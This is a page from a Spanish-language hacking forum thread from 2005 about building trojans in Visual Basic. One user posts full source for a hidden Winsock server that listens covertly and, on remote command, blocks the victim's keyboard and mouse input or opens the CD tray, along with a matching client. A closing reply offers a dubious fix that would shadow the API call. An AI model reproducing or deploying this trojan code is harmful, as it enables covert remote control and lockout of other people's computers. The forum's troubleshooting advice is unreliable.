elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Problema en creacion de troyanos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Problema en creacion de troyanos  (Leído 4,554 veces)
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Re: Problema en creacion de troyanos
« Respuesta #10 en: 18 Agosto 2005, 00:05 am »

¬¬

No tengo ganas de que me copien el codigo..
Entonces cuales son las declaraciones que debo hacer?


En línea

NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Problema en creacion de troyanos
« Respuesta #11 en: 21 Agosto 2005, 04:56 am »

Citar
No tengo ganas de que me copien el codigo..

Si no existiera gente que hace programas open source estarias ahora en este foro ...


En línea

- n0sEcReT -

Desconectado Desconectado

Mensajes: 284


Impossible is nothing


Ver Perfil WWW
Re: Problema en creacion de troyanos
« Respuesta #12 en: 21 Agosto 2005, 05:19 am »

Citar
No tengo ganas de que me copien el codigo..

Si no existiera gente que hace programas open source estarias ahora en este foro ...

Si no existiera gente que hace programas open source NO estarias ahora en este foro ...

Hay que compartir todo lo que hace uno , va eso pienso y hago yo .Esta bien que uno se puede reservar algo , pero si te quieres reservar algo no lo publiques a codigo abierto xD.

Salu2 !  ;)
En línea



NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Problema en creacion de troyanos
« Respuesta #13 en: 21 Agosto 2005, 09:22 am »

gracias x la correccion ;)

en fin se entendio lo que kise decir xD
En línea

sorcerer


Desconectado Desconectado

Mensajes: 365



Ver Perfil
Re: Problema en creacion de troyanos
« Respuesta #14 en: 25 Agosto 2005, 10:25 am »

bue chicos el codigo del el señor es muy parecido a este:


Servidor:
Código:
Private Declare Sub InitCommonControls Lib "comctl32.dll" ()

Private Sub Form_Load()
Me.Hide
Winsock1.Listen
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
Dim colgar As String
Dim abrir As String
Winsock1.GetData datos
colgar = "colgar"
abrir = "abrir"


If datos = colgar Then
    BlockInput True
End If

If datos = abrir Then
Dim res As Long, ReturnString As String * 127
    res = mciSendString("Set CDAudio Door Open", ReturnString, 127, 0)
    End If

End Sub

module 1:
Código:
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

medule 2:
Código:
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal _
lpstrReturnString As String, ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long


en ese momento no se porque le puse 2 modules, creo que porque los controles de las api los abia copiado de www.lawebdelprogramador.com pero este codigo anda

y el cliente pa los boluss
Código:
Private Sub Command1_Click()
Winsock1.RemoteHost = Text1.Text
Winsock1.Connect
End Sub

Private Sub Command2_Click()
Dim colgar As String
colgar = "colgar"
Winsock1.SendData colgar
End Sub

Private Sub Command3_Click()
Dim abrir As String
abrir = "abrir"
Winsock1.SendData abrir
End Sub
« Última modificación: 25 Agosto 2005, 10:32 am por sorcerer » En línea

Las creaciones humanas son imperfectas,
por la imperfeccion de su creador
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Problema en creacion de troyanos
« Respuesta #15 en: 26 Agosto 2005, 15:13 pm »

si el problema te le da en el BlockInput alomejor es por que no le as declarado como Boolean:

Código:
Dim BlockInput As Boolean

Salu2
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
problema spytech spyagent en mi ordenador y troyanos
Seguridad
d3lam3tro 1 2,303 Último mensaje 26 Enero 2013, 03:14 am
por r32
problema en la creacion de shellcode basica « 1 2 »
Análisis y Diseño de Malware
daryo 13 7,541 Último mensaje 19 Agosto 2014, 17:23 pm
por MCKSys Argentina
problema con creación de usuarios
Windows
migue.777 1 1,899 Último mensaje 22 Octubre 2019, 17:58 pm
por EdePC
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines